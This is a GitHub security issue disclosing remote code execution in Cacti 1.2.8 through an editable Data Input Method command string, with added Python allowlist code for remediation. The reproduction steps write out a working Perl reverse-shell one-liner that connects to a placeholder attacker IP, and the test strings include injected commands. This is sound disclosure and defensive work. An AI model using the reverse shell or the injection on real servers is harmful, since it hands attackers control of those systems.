
Critical vulnerability: Remote Code Execution via string/command type Input String #3186

Closed
@0xfatty

Description


Describe the bug
An input validation error in data_input.php leads to Remote Code Execution via the Input String (Script/Command) edit action. By default, Cacti is installed with several Data Input Methods. Some of them were created using the Script/Command input type. An attacker is able to edit the Input String to insert malicious code and take control of the server.

Cacti version: Latest (1.2.8)

To Reproduce
Steps to reproduce the behavior:

  1. After logging in, navigate to Data Collection -> Data Input Methods -> Unix - Ping Host
  2. By default, the Input String is specified as: perl <path_cacti>/scripts/ping.pl <hostname>. Let's append a malicious perl script in front of the current script:

perl -e 'use Socket;$i="**ATTACKER-IP**";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; perl <path_cacti>/scripts/ping.pl <hostname>

  3. By default, the Unix - Ping Host data input method is used by the Unix - Ping Latency graph template. This means we can create a Unix - Ping Latency graph on the current device and gain Remote Code Execution.

Expected behavior

  • By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended to the Input String, the server will make a call back to the attacker's machine first.

Impact

  • The vulnerability would let an authorized user take control of the server. The attacker will then be able to take down the system as well as use the system for malicious purposes.


Desktop (please complete the following information):

  • OS: Kali Linux, Ubuntu
  • Browser : Firefox, Chrome
  • Version: Firefox 72.0, Chrome 79.0.3945.117

Remediation

  • I would think about two (2) solutions:
    1 - Using a regex to catch all strings different from the expected string
    2 - Hard-coding the perl script into the source code and forcing the application to take only one filtered input (hostname).

Chi Tran
research@ctrsec.io
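The two remediation options above, and a sweep for Input Strings that have already been tampered with, as an added example (this is not Cacti's code or the reporter's). It assumes the placeholder conventions visible on this page: placeholders are written as <name>, scripts live under <path_cacti>/scripts/, and a legitimate Script/Command Input String has exactly the shape "interpreter <path_cacti>/scripts/<script> <placeholder> ...". The sample strings are constructed for the example.

```python
"""Allowlist validation for Cacti-style Data Input Method command strings.

Added example, not Cacti's code. Assumptions: placeholders look like <name>,
scripts live under <path_cacti>/scripts/, and the only legitimate shape of an
Input String is "<interpreter> <path_cacti>/scripts/<script> <placeholder>...".
"""
import re
import shlex

# Constructed samples: the stock string from the report and three tampered ones.
DEFAULT_PING = "perl <path_cacti>/scripts/ping.pl <hostname>"
REVERSE_SHELL = "perl -e 'exec(\"/bin/sh -i\")'; " + DEFAULT_PING     # prepended command
TRAILING_CMD = DEFAULT_PING + "; id"                                  # appended command
SUBSHELL_ARG = "perl <path_cacti>/scripts/ping.pl $(id)"              # placeholder replaced

ALLOWED_INTERPRETERS = {"perl", "sh", "php", "python"}
# Script name only: no '/' so "../../" cannot escape the scripts directory,
# and an extension is required so "." or ".." alone do not match.
SCRIPT_RE = re.compile(r"^<path_cacti>/scripts/[A-Za-z0-9_-]+\.[a-z]+$")
PLACEHOLDER_RE = re.compile(r"^<[a-z_]+>$")
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def is_allowed_input_string(input_string: str) -> bool:
    """Remediation option 1: accept only the expected shape, reject everything else."""
    try:
        tokens = shlex.split(input_string)
    except ValueError:  # unbalanced quotes: definitely not a stock string
        return False
    if len(tokens) < 2 or tokens[0] not in ALLOWED_INTERPRETERS:
        return False
    if not SCRIPT_RE.match(tokens[1]):
        return False
    # Every remaining token must be a bare placeholder. A ';' glued to a
    # placeholder, a '$(...)' or an extra word all fail this check.
    return all(PLACEHOLDER_RE.match(tok) for tok in tokens[2:])


def scan_input_strings(input_strings):
    """Return the configured Input Strings that do not pass the allowlist,
    e.g. for a sweep of an existing install after this report."""
    return [s for s in input_strings if not is_allowed_input_string(s)]


def build_ping_argv(path_cacti: str, hostname: str) -> list:
    """Remediation option 2: the script path is fixed in code; the only
    user-controlled value (hostname) is validated and returned as a separate
    argv element. Run it with subprocess.run(argv) (a list, no shell=True)
    so no shell ever parses the hostname."""
    if hostname.startswith("-") or not HOSTNAME_RE.match(hostname):
        raise ValueError("invalid hostname")
    return ["perl", f"{path_cacti}/scripts/ping.pl", hostname]


if __name__ == "__main__":
    for s in scan_input_strings([DEFAULT_PING, REVERSE_SHELL, TRAILING_CMD, SUBSHELL_ARG]):
        print("REJECT:", s)
    print("argv:", build_ping_argv("/var/www/cacti", "example.org"))
```

The validator tokenises with shlex rather than scanning for metacharacters because '<' and '>' are legitimate as placeholder delimiters; the shape check then makes any extra command, argument or path component fail regardless of which character introduced it.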

Labels: SECURITY (a security issue reported through CVE), installer (installation issue)
